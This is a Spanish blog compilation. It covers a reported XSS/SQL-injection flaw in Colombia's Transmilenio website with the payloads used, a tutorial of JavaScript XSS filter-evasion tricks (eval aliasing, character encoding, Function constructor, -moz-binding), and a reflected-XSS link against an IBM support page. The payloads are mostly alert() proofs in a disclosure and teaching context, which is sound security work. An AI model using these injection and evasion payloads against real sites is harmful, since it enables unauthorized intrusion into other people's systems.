Descargar Paper

Nota: este artículo te podría interesar si deseas saber cómo solucionar problemas de seguridad de manera “profesional“.

De pequeño siempre quise ser Ingeniero de Sistemas… ahora, con 19 años ya llevo 6 semestres (de 10 aquí en Colombia), aún cuando no he estudiado por 2 años falta de dinero, ya no se que quiero hacer.

Con algo que llevo de experiencia mezclándome con “ingenieros” me da algo de tristeza ver cómo de cada 20 hay 1 que vale la pena. Los demás son personas que no tienen puta idea de lo que hacen, estudiaron esto no por vocación sino porque piensan que se van a forrar en dinero, y además se creen Dioses que todo lo saben (aún cuando dedican la mayor parte de su tiempo laboral chateando con el MSN, volviéndose maestros en el uso del Facebook, o perdiendo el tiempo de cualquier otra manera).

La verdad es que hace tiempo quería escribir algo sobre esto, pero no lo hacía simplemente porque muy seguramente los lectores asiduos de este humilde blog no tienen nada de mediocres, y los ingenieros (a quienes iría dirigida la entrada) ni siquiera saben lo que es un puto lector de feeds, o me leerían usando IE 6.0 (no saben que existen “otros”) que a veces no carga bien esta página.

La historia… (aprende a solucionar problemas de seguridad)

Hace una semana entré a la página web del sistema de transportes colombiano Transmilenio, y descubrí que el sistema de búsquedas era vulnerable a ataques XSS y al famoso SQL Injection, por lo cual procedí (después de jugar un par de horas y descubrir ciertos datos interesantes) a avisar del fallo.

La cosa iba así para un XSS:

hola%' or title like '%hola> <script>alert(/POWNED/)</script><a

Y así para un SQL Injection:

hola%' UNION select * from NOMBRE_TABLA where 1=1 or 1 like '%1

Lo cierto es que esto es algo que se puede solucionar fácilmente, haciendo una limpieza a las variables antes de realizar una búsqueda en la base de datos, pero nuestros super ingenieros (que ni siquiera dieron las gracias) encontraron una mejor solución (la más óptima): deshabilitar las búsquedas.

Y aquí es donde no sé si reir o llorar. Poca vergüenza tiene esta gente, y lo peor es que los hay por montones. Muy triste…

También te podría interesar este artículo: Devolver el orgullo al nombre de “programador” para solucionar el déficit de programadores publicado en Punto de partida

Bonus…

• Protegiéndose frente a la inyección SQL
• Protegerse de un ataque SQL Injection
• Detén los ataques de Inyección SQL antes de que ellos te detengan a ti

P.d. esta es una entrada programada escrita el Viernes 1 de Agosto de 2008. Solo para dejar terminar la semana y ver si lo solucionan.

He leído una entrada de Gareth Heyes (la escribió el dia de mis cumpleaños XD), en el blog The Spanner, en donde se trata un tema que me gusta bastante: Hacking con JavaScript.

Para los que no sepan qué es JavaSript pueden hechar una ojeada en la Wikipedia, para una referencia rápida. JavaScript es un lenguaje ampliamente usado en la Web, y más aún cuando las aplicaciones Web 2.0 usan AJAX para casi todo, a tal punto que cada vez de desarrollan más FrameWorks especiales para dicha tarea.

Por tal motivo me gustaría compartir con ustedes algunas cosas interesantes, que tomo del post de Gareth Heyes, en cuanto a algunas características de JavaScript que nos ayudarán cuando estemos buscando bugs XSS, por ejemplo. Comencemos!

¿Qué puedes hacer si no es posible usar eval()?

En Javascript puedes guardar referencias a funciones nativas en vairables, de modo que puedes hacer lo siguiente:

x=eval;
x();// llamar eval

En navegadores basados en el motor Gecko también te permiten llamar la función eval así:

0['eval'](‘alert(/XSS/)’)

Por lo que puedes hacer cosas cómo (solo usa tu imaginación):

0['ev'+'al'](‘alert(/XSS/)’);

Trabajando con caracteres/palabras…

Javascript soporta varios tipos de codificación que te permiten representar diferentes caracteres. De esta forma, el siguiente ejemplo crea la conbinación función eval y alert:

alert(‘\141\154\145\162\164\050\061\051′)

Ya que \141 se traduce en ‘a’ etc, cuando tienes un string en javaScript usando “” or ” puedes usar caractéres UNICODE, entonces, cuando JavaScript encuentra el caracter ‘\’ este será convertido a una letra, dependiendo de su código.

Codificación Hexadecimal también puede ser usada así:

alertString = ‘a\x6cert(1)’;

Puedes también usar eval para que convierta el caracter por tí, por ejemplo en siguiente código produce la letra ‘a’:

harNumber = 141;
stringQuote = “‘”;
backslash = “\\”;
alert(eval(stringQuote + backslash + charNumber + stringQuote));

¿Cómo hacer llamadas a funciones anónimas?

JavaScript te permite invocar funciones cuando usas ‘()’, pero también puedes lo puede usar para realizar invocaciones a funciones anónimas, así:

new Function(‘alert(1)’)();

El código de arriba crea una nueva función anónima y pasa el string ‘alert(1)’ que se incrustó en la función recién creada, lo que luego ejecuta la función. Puedes también combinar las técnicas mencionadas, usando por ejemplo codificación de caracteres en el parámetro que recibe la nueva función, de hecho, no es necesario especificar la palabra reservada ‘new’:

Function(‘a\x6cert(1)’)();

¿Qué puedes usar como nombre de variables?

Javascript no es muy estricto en cuanto a nombres de variables, por lo que se pueden declarar variables con el caracter ‘_’, incluso ‘$’ puede ser usado como nombre de variable.

¿Cómo puedes crear un String?

Los Strings son definidos usando String(), ” y “” etc. Lo que tal vez no sepas, es que las expresiones regulares pueden también ser usadas para crear un string, como en el siguiente ejemplo:

newString = /XSS/.source;
newString = /XSS/ + ”;
newString = newString[1] + newString[2] + newString[3];

Necesito usar un caracter pero no está permitido, ¿cómo le hago?

Piense alrededor del problema, en vez de intentar acceder al caractér directamente, obtenga la información de otra fuente. Supongamos que quieres el caractér dos puntos (:), es un ejemplo, y haz intentado de codificando caracteres pero no lo haz logrado… puedes entonces usar la propiedad URL para obtener ésta información. Ejemplo:

alert(document.URL.substr(4, 1));

¿Hay alguna forma de ejecutar JavaScript en CSS?

Firefox tiene unas pequeñas características que permiten una ejecución inusual de Javascript, entre ellas está la extensión CSS -moz-binding que te permite enlazar documentos XML usando CSS. Por ejemplo:

<p style=-moz-binding:
url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss);>
Test</p>

¿Cómo puedo usar XML con Javascript?

Firefox ahora soporta XML en el código Javascript, puedes por ejemplo incluir etiquetas de esta manera :

testXML = <s>Test XML string</s>;
alert(textXML.text());

Enlaces de interés:

• JavaScript for Hackers
• JavaScript in line debugger (JaSiLDBG)

Me han pasado un link [de Arian Evans desde Whitehat Security], en el que podríamos ver un ejemplo claro de “ironía informática”. Este enlace me ha hecho mucha gracia, y por eso lo comparto con ustedes. El enlace apunta a una protección del filtro QuickPlace XSS en el sitio Web de IBM. La ironía aquí es que dicho enlace en donde se describe las virtudes de l flitro XSS es vulnerable para XSS. Vaya ironía.

En este caso el XSS fue inyectado dentro de el parámetro xml:lang=… y pues nada… nada más que decir. Les dejo el link:

http://www-1.ibm.com/support/docview.wss?uid=swg21233077&loc=%22%3E%3Cbody%20onload=alert(‘XSS-AQUI’)%20x=%22en_US